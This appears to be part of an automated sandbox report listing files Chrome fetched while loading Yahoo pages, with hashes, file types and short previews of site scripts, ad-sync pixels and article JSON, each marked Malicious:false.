                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum.casalemedia.com/rum?cm_dsp_id=65&external_user_id=AQAJI_rTa6b56AJakrmYAQEBAQEBAQCTbI5xXgEBAJNsjnFe&expiration=1728501369&gpp_sid=-1&gpp=DBAA&is_secure=true&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7784)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.590889945971922
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:z5ogup5Fjc+J4WRWNCdSEnIONsg0ZLqlP2aPK/hc:z5op5FjHJ4QodEIOzSqlVK/q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A40971204AAC8236841FE06C8D6B0943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:00EDF84379CE4F1FBAD3A835CF3F0F68D057AE6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:70745CD97D02D72E44DDEBE21ED947E764439A97272B292C0898AF32618F52C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A4D527D8B64F03DCBF4C114DE1624CCE13BA4852F77BD15B0EDD6673C66848E74948E7C5A069388CF569705FAD06ED281FF2788DBDE96BD03FE6C88D93F92FFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/nodes/82.CznuZwgS.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["../chunks/MarketsHeatmap.BTg5AOHG.js","../chunks/scheduler.Dr9AAxFe.js","../chunks/index.DCSmZEjO.js","../chunks/each.BExQfwb4.js","../chunks/HeatMap.B0RGnH8g.js","../chunks/ErrorMsg.DF_ReW41.js","../chunks/error_outline.CkdKfkE_.js","../chunks/Icon.BSWt_jx8.js","../chunks/spread.CgU5AtxT.js","../assets/Icon.DgFg0-NP.css","../chunks/commonUtil.CI22_Irn.js","../chunks/stores.DPDRpTFd.js","../chunks/43.CtYdpA_T.js","../chunks/control.CYgJF_JY.js","../assets/ErrorMsg.CmzKsgiD.css","../chunks/Link.Cll6KZpb.js","../chunks/i13nUtil.C-uBpR7k.js","../assets/Link.CHR7GGSC.css","../chunks/Spinner.CydnjLPC.js","../assets/Spinner.DBQ4b_Oq.css","../chunks/Tooltip.DgP4ayih.js","../chunks/floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","../chunks/GradientScale.EwYudrQa.js","../assets/GradientScale.BwfNrsj8.css","../assets/HeatMap.v9WG23fw.css","../chunks/quoteUtil.DBZgD1yl.js","../chunks/loadQuoteType.mGEeGxqN.js","../chunks/logUtil.hOue7iAU.js","../chunks/index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2498)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.984712010022404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:FoOmAEdAPZMULQ25ikN3hyTIJTs33P0HV6R4GXruWDg:FcSZpLQ2wc3MmVgyAruL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:42E0642CBFA9DDC3D8264647BF38A226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7FB5B5F6BBD0FDD4EA5B96F92BA6F81F582CA1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:859FF301A8BA53BD7393A2D88BAAE1E18978EDD1EDFEC35D1BD2A40D2F75083B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3BE6E79DD528B7AEBA483942FB3DD07AAA332538650544A461A2BC7139DA120C33A13EACC94645D72D1C172E8203574F14AA43367DC737F2FA975266116B51D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as f,d as u}from"./commonUtil.CI22_Irn.js";import{l as V,f as y}from"./logUtil.hOue7iAU.js";import{g}from"./i13nUtil.C-uBpR7k.js";function H(t){return typeof t=="string"?t:t.key}async function p(t,s){const{key:n,action:e,getComponent:a}=s;try{const[r,o]=await Promise.all([e(),typeof a=="function"?a().then(C=>C.default):Promise.resolve(void 0)]);return{key:n,action:e,getComponent:a,Component:o,error:!1,loading:!1,value:r}}catch(r){return V(t,{},{data:r,isCritical:!1,perfLabel:`loadLazy:${n}`}),{key:n,action:e,getComponent:a,error:!0,loading:!1}}}async function w(t,{action:s,getComponent:n,key:e,immediate:a=!1}){const[r,[o]]=await Promise.all([f(t),u(["lazy"],t)]),C=a||r.bot==="1"||r.mode==="failsafe",i={key:e,action:s,getComponent:n,loading:!0,error:!1};if(!C)return o.setEntry(e,i);const l=await p(t,i);return o.setEntry(e,l)}async function v(t,s){const n=H(s),[e]=await u(["lazy"],t),a=e.getEntry(n);if(!a||!a.loading)return a;const r=await p(t,a);return e.setEntry(n,r)}async fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1354589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.8386814913497975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:TMnH3lhFdxiE03e8d4e8J2zTauN/muKob+0:TMnH3lhFdxiE0u8d4e8J2zTauN/muKoH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3E6BC7FF8C0DBBA07B217FE2B9CC7BDF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49E027BE0C0365C6DFF8E61F69A5FE76D954B589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:097EBD14127FA317B37CFBEB6F82DF2AAED3871C9989E43B0746B702BAD3FA73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:812CAE9ECD4E8EDBC8E679C70D118C838E6FFB526AA1C61B39033C16C949DEB7ACA415BB49C4635C73D13EF351382B35CD403FEFC43064BBFEB525FD9E037967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://www.yahoo.com/caas/content/article/?uuid=12dfba99-00cf-4f01-ac78-06d6c0d07524,0468abf9-ac9d-470b-a17a-0abbf27eb007,1072b278-f788-45ae-9e2f-e1732f12bcde,1b31ce0a-38da-40ff-8bf8-df7bfd4c3b89,4d305d2a-95ac-41bb-b482-7f09ed368552,637e8837-4314-4f37-8ae7-414f1cd9b94f&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"amazon;news;prime-day;shopping;shopping;hobbies","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Amazon_Prime\" ctopid=\"1878000;10610489;1720500\" hashtag=\"amazon;news;prime-day;shopping;1878000;10610489;1720500\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-1605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4365), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.145735525465993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:3hNzEpwq1krLq1Jr/9Ipefr4qN1lnA7O39IptQbmGMakwQy+p:3zEwuuLul/2pefN1lAC32Aa/akty+p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9D2A8EFBE3FE9705E54DF41100EA2DAE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9CA39F309735BE4BDA4D6CE2D01C5F0857BD8E67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F59452BBA989E5A78E9492AE296CBF910745529C3294B49A58EFA4EC7EBA8D45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5D460C83F9DD30038422F843C68D1BE812E3006395355122BBA8E8608822B9751D2800FE024C85276FA36130D787364CF6CFAF333F9C0D3CC6FC2E3DEC796775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-clipboard-copy"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.605884566975594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2e2C6hHfhiVIliWfwpkKzN9ROcOBZWHBbOQABf:2e2C6lICiqcn0KHBbnABf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7D6D55A3D3924BDC934EC46092832C3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5AC0465103E2F2916790C3ED97172ED6C23C6C49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0CE24C8DEB7BE91D0C5E44A0F532A8A3709E90C7036832E3BE6184C1D4FD1373
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5C44B66D960A18C21B0BA5DC99910F460A677B039ACAC5FAC0A1901AC87C15D796EE5C4B0418240B942C2114274912974B578FCA7345404E5531C44F4DF8343
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://yahoo-bidout-d.openx.net/w/1.0/pd?cc=1&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://sync-tm.everesttech.net/upi/pid/ny75r2x0?redir=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D537148856%26val%3D%24%7BTM_USER_ID%7D"><img src="https://pr-bh.ybp.yahoo.com/sync/openx/7f256087-ba91-a1f1-4686-9037b07ec951?gdpr=0"><img src="https://s.amazon-adsystem.com/dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=b3347abe-3697-8842-b75f-0455271acff8"><img src="https://match.adsrvr.org/track/cmf/openx?oxid=ebe206c3-2a3d-33b8-7751-86c24f290418&gdpr=0"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=Yzc4ZGQ1MDktZTM0YS02ZDFjLTYyYjEtZGM3Yjg1Y2JjYTc4"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_cm&google_sc">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (54741)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):55548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.334880584436118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:4Kn7SMLJEbq7hy43dyBGLaNctTfmetimVLeaKLwmE1dpoTTh795gfE3l/9rbL:4w7mSTNyBimMf9wx6E1Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:01B5D1FD4FCDC3A37D339362F92A38BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7DEF15BDA6DE0EA2FE5B32BEC1A4C300CB6E02C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8154AA9057E3367D9D3E4BB1F85DB9645C01FC0690091AADC57DBAE849BA3499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DBE2357D30B523C9BF7EF88B536A152DC9B461669B4CFFECA73B4ECBFC1927E3D1B0488CCBA6CD48A924BAD4A002D3578F9D5C9BAD65590C207D5D9200793DFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/ads/studio/cached_libs/gsap_3.0.1_min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t=t||self).window=t.window||{})}(this,function(e){"use strict";function _inheritsLoose(t,e){t.prototype=Object.create(e.prototype),(t.prototype.constructor=t).__proto__=e}function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}./*!. * GSAP 3.0.1. * https://greensock.com. *. * @license Copyright 2008-2019, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for. * Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */function n(t){return"string"==typeof t}function o(t){return"function"==typeof t}function p(t){return"number"==typeof t}function q(t){return void 0===t}function r(t){return"object"==typeof t}function s(t){return!1!==t}function t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.164896592899132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJ9qq0Hacz:hxuJ9I3z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C242F921F5A3C5B061E5EFEFCC6A380A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B268FDC3FF0278FDB1F7E63A9230B9292B8F846A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C78038539D61FB4A84B70308E1A825D638CFACC207299B6FE6FB5D8FB1E8497F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC88BC923453936883FFF2A2C753616E556786C113FADD96376687A5CEBCBC13DA05691CD1062089BA63FCA92B43A20C481FC5F703F64E4A99E5EEDD8304B073
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ssp-sync.criteo.com/user-sync/iframe?gdprapplies=0&gdpr=&ccpa=&gpp=&gpp_sid=&redir=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dcriteo%26gdpr%3D0%26gdpr_consent%3D%26gpp%3D%26gpp_sid%3D%26f%3Di%26uid%3D%24%7BCRITEO_USER_ID%7D&profile=230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html><body>.</body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16111)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.272168851000061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:TFcFsc1FscPFschsibwBzwXyL3fseV3Lkz58K:T+TbwNlLpx25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A857CE7356B2ECB1A2184FF8BBB1545E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA9C9E26424E19CAE7AE4A7F389BB1E33A5C7443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:86024C041E1C00572DC75BF3C28CABDCEFC32B9B81C22A1123FDFE94C73090A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA96A3AB3B5AAE70C9735FA592B2FF3CEF7C1A2609DC0B09C86C7EC131F7BC04E82DF55AD993ACA5F68DFF4E4A9E80E33D34B9FCA4129FDD8434574081F7410E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a as n,t as m,f as u,b as T,N as A,c as R}from"./commonUtil.CI22_Irn.js";import{p as N}from"./43.CtYdpA_T.js";import{l as C}from"./loadQuoteType.mGEeGxqN.js";import{e as g}from"./index.g5YcAAdQ.js";const H=/[a-zA-Z0-9^.$_+=*&:@~-]+/g,l={POST:"POST",PRE:"PRE",REGULAR:"REGULAR"},L=["__quoteLeaf","__companyInsights","__quoteleaf"],F=["/valute/convertitore","/divisas/conversor","/devises/convertisseur","/waehrungen/waehrungsrechner","/finanzas-personales/conversor-divisas"],G={CLOSED:l.POST,POST:l.POST,POSTPOST:l.POST,PRE:l.PRE,PREPRE:l.POST,REGULAR:l.REGULAR},B=new Set(["analyst-ratings","analysis","balance-sheet","cash-flow","community","components","history","financials","futures","holders","holdings","insider-roster","insider-transactions","key-statistics","latest-news","news","options","performance","press-releases","profile","purchase-info","risk","sec-filing","summary","sustainability","chart"]),K=["price","summaryDetail","pageViews","financialsTemplate"],Y={MONEYMARKET:"pf-b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.32203621037149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:+7yzk8YvPEi6qA0zonBU07qdgp1qds7dbaXxitE+7K1Uh++xnvQ956eY+pstV0hh:+7ZPvMzBfqSqAYUU+xnI9ovINZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.906368642384546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSLY+6LZLv7AW8yXxAuKUC4XXAwL+LA00JIXTMWQAdVKBUpFR:x7ZD7AtzuKIC90YTXQ4VKBUF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CB8903C511E71769F3DF7591C54FCCA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9B6302368BB6E10043A7DEBD005DAA7D49D76EDF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6ACD9D8B81E5518D51421F0531DB05EFEB226C6797C4B5E7ADA491B2A874762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2F0F757F3A1E74FA7BD0DB88F758030D02FBF23D4096E6936152DE75A228DFD662229F61899354489127E4E1BCA45B53A0FB9794C955036F2F9D6B1936E88126
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as o}from"./commonUtil.CI22_Irn.js";async function n(t,e){const[a]=await o(["meta"],t);return a.updateMeta(e),Promise.resolve()}export{n as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.994787172741404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yLRmcpZ6CdPtpOq94IhXVHws6Tac3mDDpKfFsLGD/DNKv:yL/pZ6CVCq9JVHwJW1iFqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CA243B22264DCA7A4A899C51CC2DC963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF47310BBB10F981E5735CBCB6196F688782A625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:95FB5A5390AFDA7B7734B303C9F724039FDA305313CE9517AA5F7A544A208AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:704E626A74A47B560B3316788B46F7CAF94E1E831B9290551C52DBF4D1E8DD8B72BACBBF6164EAA393BD97DABA0C351881B2F9D83A92F3BAAC49322BF9B5040B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4713544870139303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:dRYtyn:Tuyn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:34C520D87664032692C4315FFF455D18
